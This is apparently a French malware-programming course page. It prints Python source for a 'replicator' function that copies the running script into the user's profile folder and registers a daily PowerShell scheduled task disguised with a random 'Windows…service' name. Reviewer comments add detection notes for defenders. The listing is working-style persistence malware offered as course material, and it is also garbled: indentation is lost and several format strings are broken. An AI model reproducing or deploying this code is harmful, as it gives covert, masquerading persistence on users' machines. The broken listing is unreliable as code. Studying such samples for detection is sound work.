Cours 3 MW Python

Malware

II. Replicator

Définir la fonction replicator()

# Course sample, first part of replicator(): collects the running script's
# path, the user's profile directory and randomised task name/description
# strings that the later try/except part of the page uses.
# NOTE(review): this listing has lost its indentation, so which statements
# belong to the function body and to the for loop cannot be confirmed from
# the page.
def replicator():
# Path the script was started with (argv presumably comes from sys; the
# import is not shown on the page).
thisfile_plus_loc = argv[0]

# Starts powershell.exe as a child process to read the USERPROFILE variable.
# For defenders: a Python interpreter spawning powershell.exe shows up in
# process-creation telemetry (Security event 4688, Sysmon event 1) together
# with the command line.
getenv = subprocess.Popen(["powershell.exe", "echo $Env:USERPROFILE"], stdout=subprocess.PIPE, shell=True)
# communicate() returns (stdout, stderr); only stdout is used below.
(threee,fourr) = getenv.communicate()
env = threee.decode()
# Normalise the profile path: backslashes become forward slashes and "\n" is removed.
env = env.replace("\\", "/")
env = env.replace("\n","")


# Same separator normalisation for the script's own path.
thisfile_plus_loc = thisfile_plus_loc.replace("\\","/")

# Sub-folder(s) of the user profile used as the copy destination.
dirlist = ['/Document']

for k in dirlist:
# Destination directory = profile path + sub-folder.
dirName = env + k
# Random material for the scheduled-task name, description and trigger hour.
wordsgen = random.choices(string.ascii_lowercase, k=4)
descgen = random.choices(string.ascii_uppercase, k=3)
timegen = random.choices([1,2,3,4,5,6,7,8,9,10,11])
# Task name: "WIN" followed by four lowercase letters.
wordsgen = ''.join(wordsgen)
wordsgen = "WIN" + wordsgen
# Description: "Windows" + three uppercase letters + "service", i.e. text
# made to resemble a legitimate Windows component. For defenders: task names
# matching WIN[a-z]{4} with a description matching Windows[A-Z]{3}service
# are a hunting pattern for this sample.
descgen = ''.join(descgen)
descgen = "Windows" + descgen + "service"
descgen = descgen.replace(" ", "")
# String form of the value chosen for the daily trigger time.
timegen = str(timegen)

 

III. Exécution et gestion des erreurs (try/except)

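Exécution et gestion des erreurs pour replicator() : cette partie copie le script puis enregistre une tâche planifiée quotidienne. Côté défense, la création de la tâche est journalisée (événement 4698 du journal Sécurité lorsque l'audit correspondant est activé).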

# Course sample, second part of replicator(): copies the running script into
# the destination directory, then registers a daily scheduled task pointing
# at the copy (persistence via scheduled task, MITRE ATT&CK T1053.005).
# Uses thisfile_plus_loc, dirName, timegen, wordsgen and descgen from the
# first part of the listing.
# NOTE(review): indentation is lost on the page, so the exact nesting of this
# try/except inside the for loop and function is presumed, not shown.
try:
# Copy step: powershell.exe is started with a "cp" command built from the
# script path and the destination directory. For defenders: the child
# process and its command line are visible in process-creation logs
# (Security event 4688, Sysmon event 1) and in PowerShell script block
# logging (event 4104) when enabled.
doreplicate = subprocess.Popen(["powershell.exe", "cp '{0}''{1}'".format(thisfile_plus_loc, dirName)],
stdout=subprocess.PIPE, shell=True)
(six,seven) = doreplicate.communicate()
repltwo = six.decode()
print("[!] Copy outputs:",repltwo)
# Last backslash-separated component of argv[0], i.e. the script's file name.
filename = argv[0].split("\\")
filename = filename[-1]
# Path string that the scheduled task is given as its argument.
programloc = dirName + filename

# PowerShell command string: New-ScheduledTaskAction runs Powershell.exe with
# programloc as argument, New-ScheduledTaskTrigger sets a daily trigger from
# timegen, and Register-ScheduledTask registers it under the random name and
# description. For defenders: task registration is recorded as Security event
# 4698 (when object-access auditing is enabled) and as event 106 in the
# TaskScheduler/Operational log; a task whose action is Powershell.exe
# pointing into a user-profile folder is worth alerting on.
command = "$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '{0'; " \
"$trigger = New-ScheduledTaskTrigger -Daily -At{1}am; " \
"Register-ScheduledTask -Action $action -Trigger $trigger -TaskName '{2}' -Description'{3}'"\
.format(programloc,timegen,wordsgen,descgen)

# Runs the registration command in another powershell.exe child process.
schedd = subprocess.Popen(["powershell.exe", command], stdout=subprocess.PIPE, shell=True)
(eight,nine) = schedd.communicate()
reply = eight.decode()
print("[$] Schedule respons:", reply)

# Any exception raised above is caught and only printed.
except Exception as dirserror:
print("error:", dirserror)
# NOTE(review): whether this line sits inside the except branch or after the
# try/except cannot be told from the page.
print("[+] Done.")